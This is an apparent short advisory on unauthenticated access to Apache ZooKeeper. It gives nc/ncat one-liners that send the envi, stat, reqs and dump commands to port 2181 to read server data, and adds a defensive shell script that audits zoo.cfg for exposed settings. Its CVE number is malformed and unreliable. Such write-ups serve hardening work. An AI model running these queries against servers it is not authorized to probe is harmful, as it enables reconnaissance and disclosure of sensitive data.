Apache ZooKeeper Unauthorized Access Vulnerability CVE-2014-085
Vulnerability Description
In its default configuration, ZooKeeper allows unauthorized access when the administrator has not configured an access control list (ACL).
Vulnerability Impact
Apache ZooKeeper
Vulnerability reproduction
Apache ZooKeeper listens on port 2181 by default. The following command retrieves sensitive data:
echo envi | nc xxx.xxx.xxx.xxx 2181
Other information
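1. stat: lists statistics about performance and connected clients.
echo stat | ncat 127.0.0.1 2181
2. ruok: tests whether the server is running in a non-error state.
echo ruok | ncat 127.0.0.1 2181
3. reqs: lists outstanding requests.
echo reqs | ncat 127.0.0.1 2181
4. envi: prints detailed information about the serving environment.
echo envi | ncat 127.0.0.1 2181
5. dump: lists outstanding sessions and ephemeral nodes.
echo dump | ncat 127.0.0.1 2181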
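Added example, not part of the original page: a shell audit of a zoo.cfg for the settings that decide whether the four-letter commands above answer unauthenticated clients. It reads ZooKeeper's 4lw.commands.whitelist and clientPortAddress settings; the two sample configs and the address 10.0.0.5 are constructed for illustration.

```shell
#!/bin/sh
# Added example: audit zoo.cfg for settings that leave four-letter commands reachable.

# Print the last value assigned to key $2 in properties file $1 (empty if unset).
cfg_get() {
    awk -v k="$2" '
        /^[ \t]*#/ { next }
        index($0, "=") {
            key = substr($0, 1, index($0, "=") - 1)
            val = substr($0, index($0, "=") + 1)
            gsub(/[ \t\r]/, "", key); gsub(/[ \t\r]/, "", val)
            if (key == k) out = val
        }
        END { print out }' "$1"
}

# Print one WARN line per finding for the zoo.cfg at $1; no output means no finding.
audit_zoo_cfg() {
    wl=$(cfg_get "$1" 4lw.commands.whitelist)
    addr=$(cfg_get "$1" clientPortAddress)
    if [ -z "$wl" ]; then
        echo "WARN 4lw.commands.whitelist is unset: the version default decides what answers"
    fi
    # Commands from this page that disclose data ('*' enables every command).
    for cmd in '*' stat reqs envi dump; do
        case ",$wl," in
            *",$cmd,"*) echo "WARN whitelist enables '$cmd' for unauthenticated clients" ;;
        esac
    done
    case "$addr" in
        ''|0.0.0.0) echo "WARN clientPortAddress is unset or 0.0.0.0: client port binds every interface" ;;
    esac
}

# Constructed sample configs: a weak one and a corrected one.
weak=$(mktemp) && hardened=$(mktemp)
printf '%s\n' 'clientPort=2181' '4lw.commands.whitelist=stat, ruok, envi, dump' > "$weak"
printf '%s\n' 'clientPort=2181' 'clientPortAddress=10.0.0.5' \
    '4lw.commands.whitelist=ruok' > "$hardened"

echo "== weak ==";     audit_zoo_cfg "$weak"
echo "== hardened =="; audit_zoo_cfg "$hardened"
rm -f "$weak" "$hardened"
```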
This post is licensed under CC BY 4.0 by the author.